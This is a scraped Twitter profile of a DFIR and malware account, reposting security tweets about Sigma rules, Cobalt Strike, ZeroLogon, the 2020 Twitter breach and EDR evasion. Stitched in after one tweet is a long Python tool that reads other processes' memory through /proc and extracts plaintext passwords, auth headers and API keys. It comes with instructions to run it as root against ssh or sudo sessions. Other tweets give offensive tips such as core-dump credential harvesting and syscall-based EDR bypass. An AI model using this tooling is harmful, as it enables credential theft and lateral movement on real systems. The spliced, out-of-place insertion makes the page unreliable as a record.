CrimsonCore (@crimsoncore)'s Twitter Profile

CrimsonCore
@crimsoncore
DFIR - Malware - Cyber Security

ID: 236552237
Joined: 10-01-2011 21:16:04
84 Tweets
92 Followers
799 Following

Nate Guagenti (@neu5ron):

It's here! Zeek log support for the SIGMA Project! Check it out over at SOC Prime's uncoder.io. Also, PR for open source w/ more details than a tweet: github.com/Neo23x0/sigma/…. There will be an introduction and rules in just a few hrs during Roberto Rodriguez 🇵🇪's hackathon

NVISO Labs (@nviso_labs):

Excited to see that Sigma now supports ee-outliers as backend! Start tagging & dashboarding your Sigma hits in Elasticsearch today!🥳 Blog post: blog.nviso.eu/2020/05/14/sig… Thanks for all the work you do Florian Roth ⚡️ Thomas Patzke! #sigma #siem #soc #elk

Chetan Nayak (Brute Ratel C4 Author) (@ninjaparanoid):

#PROTIP: If you can't listen on port 80 during a bind shell, try adding the URI '/Temporary_Listen_Address/' to your listener. Magic! You don't need administrative privileges to listen on port 80 on Windows anymore #redteam #windows

Tim Medin @timmedin.bsky.social 🇺🇦 (@timmedin):

This is a weird and fun little bug found by @julianpentest: Cmd Hijack - a command/argument confusion with path traversal in cmd.exe hackingiscool.pl/cmdhijack-comm…

Paul Seekamp (@nullenc0de):

Have a root shell on a *nix system? Need to move laterally? 1) Find processes where people might be logged in. (ps -A) 2) gcore $PID 3) strings core.$PID 4) Read credentials in clear text. NOTE: Some modern OSes protect this. Also, encrypted memory will NOT stop this attack.
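
The gcore -> strings -> grep hunt from the tweet above, as an added example that is not part of the tweet or of any tool it mentions. Instead of gcore it reads the target's mappings directly through /proc/<pid>/maps and /proc/<pid>/mem (Linux only), so it needs no gdb; it does need the same access gcore needs, root or ptrace rights over the target, and a kernel with Yama `kernel.yama.ptrace_scope` set to 1 or higher denies that for other users' processes, which is the "some modern OSes protect this" caveat. The credential regexes and the planted `password=Tr0ub4dor&3` string are constructed for the example; scanning your own PID is always permitted, which is what the self-test relies on.

```python
"""Hunt plaintext credentials in a live process's memory via /proc (Linux).
Added example: a gcore/strings/grep equivalent that needs no gdb. Requires
root or ptrace permission over the target; your own PID always works."""
import os
import re
import sys

# /proc/<pid>/maps line: "start-end perms offset dev inode [path]"
MAPS_LINE = re.compile(
    r'^([0-9a-f]+)-([0-9a-f]+)\s+(\S{4})\s+\S+\s+\S+\s+\S+\s*(.*)$')

# Credential-shaped patterns, constructed for this example; extend as needed.
# [\x21-\x7e]+ stops at whitespace *and* NUL, unlike \S+, so a hit does not
# run past a C string terminator into unrelated bytes.
CRED_PATTERNS = [re.compile(p) for p in (
    rb'(?i)passw(?:or)?d[=:][\x21-\x7e]+',
    rb'(?i)authorization:\s*(?:basic|bearer)\s+[\x21-\x7e]+',
    rb'(?i)(?:api|secret)[_-]?key[=:][\x21-\x7e]+',
)]


def proc_available():
    """True on a Linux system where /proc is mounted (the only place this runs)."""
    return os.path.exists('/proc/self/maps')


def readable_regions(pid):
    """Yield (start, end, path) for readable mappings, skipping the kernel
    pseudo-pages that cannot be read through /proc/<pid>/mem."""
    with open(f'/proc/{pid}/maps') as maps:
        for line in maps:
            m = MAPS_LINE.match(line)
            if not m:
                continue
            start, end, perms, path = int(m[1], 16), int(m[2], 16), m[3], m[4].strip()
            if perms[0] != 'r' or path in ('[vvar]', '[vsyscall]'):
                continue
            yield start, end, path


def dump_regions(pid, max_region=64 << 20):
    """Read the target's memory region by region (what gcore does in one file).
    Regions that vanish or are unreadable mid-scan are skipped, not fatal."""
    with open(f'/proc/{pid}/mem', 'rb', buffering=0) as mem:
        for start, end, path in readable_regions(pid):
            if end - start > max_region:
                continue  # huge reserved-but-untouched mappings are not worth the I/O
            try:
                mem.seek(start)
                data = mem.read(end - start)
            except (OSError, OverflowError):  # EIO on unmapped pages, >2^63 addresses
                continue
            if data:
                yield start, path, data


def find_secrets(data, patterns=CRED_PATTERNS):
    """The `strings | grep` step: credential-shaped printable runs in raw bytes."""
    hits = []
    for pat in patterns:
        for m in pat.finditer(data):
            hits.append(m.group(0).decode('latin-1'))
    return hits


def scan_process(pid):
    """Return [(region_start, region_path, hit)] for every credential-shaped string."""
    found = []
    for start, path, data in dump_regions(pid):
        for hit in find_secrets(data):
            found.append((start, path, hit))
    return found


def plant_and_recover():
    """Self-test: put a fake credential in this process's heap and pull it back
    out of /proc/self/mem. Encryption at rest or on the wire does not help here;
    whatever the process decrypted to use is sitting in plaintext."""
    planted = 'Tr0ub4dor&3'                              # constructed, not a real secret
    buf = bytearray(b'password=') + planted.encode()     # heap-resident, NUL-terminated
    hits = {hit for _, _, hit in scan_process(os.getpid())}
    del buf
    return ('password=' + planted) in hits


if __name__ == '__main__':
    target = int(sys.argv[1]) if len(sys.argv) > 1 else os.getpid()
    for addr, path, hit in scan_process(target):
        print(f'{addr:#x} {path or "[anon]"}: {hit}')
```

Run it as root against a PID from `ps -A` (for example an ssh or sudo session) and it prints each hit with the region it came from; without a PID it scans itself, which is a quick way to confirm the tooling works before you attach to anything else. Reading `/proc/<pid>/mem` goes through the same PTRACE_MODE_ATTACH check as gcore, so if the kernel refuses it for one, it refuses it for both.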

Tom Warren (@tomwarren):

the Twitter hacker reportedly got access to Twitter’s admin panel by finding login credentials pinned inside a Twitter Slack channel. If that’s true then holy shit. nytimes.com/2020/07/17/tec…

briankrebs (@briankrebs):

Twitter w/ more info on hack. A "small #" of employees "manipulated." 130 accounts targeted, succeeded in tweeting from 45 of them & may have been able to view additional info (read: DMs). On 8 accounts, d/l'd account history using Your Twitter Data tool. blog.twitter.com/en_us/topics/c…

LRQA Cyber Labs (@lrqa_cyber_labs):

Here it is - PoshC2 v7.0. Better comms, payload generation, EDR detection, Docker support and MUCH more. Thanks to Ben Turner 🇬🇧 məˈklaʊd @m0rv4i & many others! labs.nettitude.com/blog/introduci…

Chris Dale (@chrisadale):

A very useful command. This turns PowerShell's auto-complete into Linux-style autocomplete. Set-PSReadlineKeyHandler -Key Tab -Function Complete

@zephrfish.yxz.red (@zephrfish):

I've spent a few days writing up #ZeroLogon from both a #RedTeam and #BlueTeam perspective to help me expand my #PurpleTeam knowledge, it is very much a sit-down-and-read post blog.zsec.uk/zerologon-atta…

Cisco Talos Intelligence Group (@talossecurity):

Have you checked out our deep dive into Cobalt Strike detection? If not, you're missing out on new Snort and ClamAV rules, and a complete dissection of the tool threat actors are using more every day cs.co/6018GxWiw

brsn (@brsn76945860):

I just wrote a small blogpost on implementing direct syscalls in the #cobaltstrike artifact kit. Using the excellent syswhispers tool by Jackson T. Writeup at br-sn.github.io/Implementing-S… #redteam

Johnny Shaw (@jxy__s):

My recent contribution to Process Hacker: PH now has "Image Coherency" checks to highlight Herpaderped, Doppelganged, or Hollowed processes. github.com/processhacker/…

Mohamed El Azaar (@med0x2e):

An alternative to CS execute-assembly, built with C/C++ and can be used to Load/Inject .NET assemblies & * Stomping PE DOS headers. * Unlinking .NET (CLR ..etc) modules from PEB. * Static syscalls for bypassing EDR Hooks. more... bit.ly/3rgBlJt d.pr/free/i/USrbQg

Jean (@jean_maes_1994):

🚨 Open to work — AI Security/ red team / adversary sim 8+ yrs in offensive sec, ex-Cobalt Strike, SANS instructor (12 w/y) Looking for flexible, senior/principal roles w/ impact > hours DMs open or connect via: linkedin.com/in/jean-franco…